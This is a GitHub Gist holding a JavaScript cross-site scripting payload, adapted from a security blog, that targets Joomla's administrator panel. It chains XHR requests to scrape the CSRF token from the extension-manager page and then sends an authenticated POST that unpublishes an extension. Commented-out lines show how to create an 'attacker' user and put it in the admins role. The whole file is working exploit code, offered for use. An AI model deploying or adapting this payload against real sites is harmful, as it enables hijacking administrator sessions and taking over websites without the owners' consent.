Last active
October 31, 2023 11:39
-
-
Save markuta/e85e20ca8c33474d4769859b51e53e52 to your computer and use it in GitHub Desktop.
Exploiting XSS with HTTPOnly type Cookies
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Source: https://www.shorebreaksecurity.com/blog/xss-exploitation-with-xhr-response-chaining/ | |
| // This is a modfied example from the above link. It is used for Joomla | |
| try { | |
| var site = "http://localhost:8080"; | |
| // Create an XHR object for each request | |
| var csrf = new XMLHttpRequest(); | |
| var user = new XMLHttpRequest(); | |
| //var role = new XMLHttpRequest(); | |
| /* Get the CSRF token */ | |
| csrf.open("GET", site + "/administrator/index.php?option=com_installer&view=manage", true); | |
| csrf.onreadystatechange = function () { | |
| if (csrf.readyState == 4 && csrf.status == 200) { | |
| // This branch runs if the response is returned with a 200 status code | |
| // Split the response text (remember the CSRF token is included with other text in the response) | |
| /* Use REGEX to extract CSRF token */ | |
| //var token = csrf.responseText.match(/name="csrf" value="(\w+)"/); | |
| // The CSRF token in Joomla is set as the input field "name=" | |
| // For help use https://regex101.com/ along with a page source | |
| var token = csrf.responseText.match(/type="hidden" name="(\w{32})"/); | |
| // Retrieve a CSRF HTTP Header | |
| var csrfHeader = csrf.getResponseHeader("X-CSRF-TOKEN"); | |
| // Assign the array index e.g. value is at index 1 | |
| csrfToken = token[1]; | |
| /* Use CSRF token to create a new user */ | |
| user.open("POST", site + "/administrator/index.php?option=com_installer&view=manage", true); | |
| // Set custom CSRF header and Content-Type | |
| user.setRequestHeader("X-CSRF-TOKEN", csrfHeader); | |
| //user.setRequestHeader("Content-Type", "application/json; charset=utf-8"); | |
| user.setRequestHeader("Content-Type", "application/x-www-form-urlencoded") | |
| // Send any cookies associated with "foo.com" along with the request | |
| user.withCredentials = true; | |
| user.onreadystatechange = function () { | |
| if (user.readyState == 4 && user.status == 201) { | |
| // 201 status code | |
| // Extract the UUID from the response | |
| //var uuid = JSON.parse(user.responseText).uuid; | |
| /* Use the UUID to add the new user to the "admins" role */ | |
| //role.open("PUT", site + "/user", true); | |
| //role.setRequestHeader("X-CSRF", csrfToken); | |
| //role.setRequestHeader("Content-Type", "application/json; charset=utf-8"); | |
| //role.withCredentials = true; | |
| // Send the role changing request | |
| //role.send("{\"uuid\":\"" + uuid + "\", \"role\":\"admins\"}"); | |
| } | |
| }; | |
| /* Send the user creation request */ | |
| // JSON Body input | |
| //user.send("{\"id\":\"attacker\", \"email\":\"attacker@example.com\"}"); | |
| // x-www-form-urlencoded Body input | |
| user.send("filter%5Bsearch%5D=&list%5Bfullordering%5D=name+ASC&list%5Blimit%5D=20&filter%5Bstatus%5D=&filter%5Bclient_id%5D=&filter%5Btype%5D=&filter%5Bfolder%5D=&filter%5Bpackage_id%5D=&filter%5Bcore%5D=&table%5Bcolumn%5D%5B%5D=1&table%5Bcolumn%5D%5B%5D=3&table%5Bcolumn%5D%5B%5D=4&table%5Bcolumn%5D%5B%5D=5&table%5Bcolumn%5D%5B%5D=6&table%5Bcolumn%5D%5B%5D=7&table%5Bcolumn%5D%5B%5D=8&table%5Bcolumn%5D%5B%5D=9&table%5Bcolumn%5D%5B%5D=10&table%5Bcolumn%5D%5B%5D=11&cid%5B%5D=92&limitstart=0&task=manage.unpublish&boxchecked=1&" + csrfToken +"=1") | |
| } | |
| }; | |
| // Send the CSRF retrieval request | |
| csrf.send(null); | |
| } catch (e) { } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment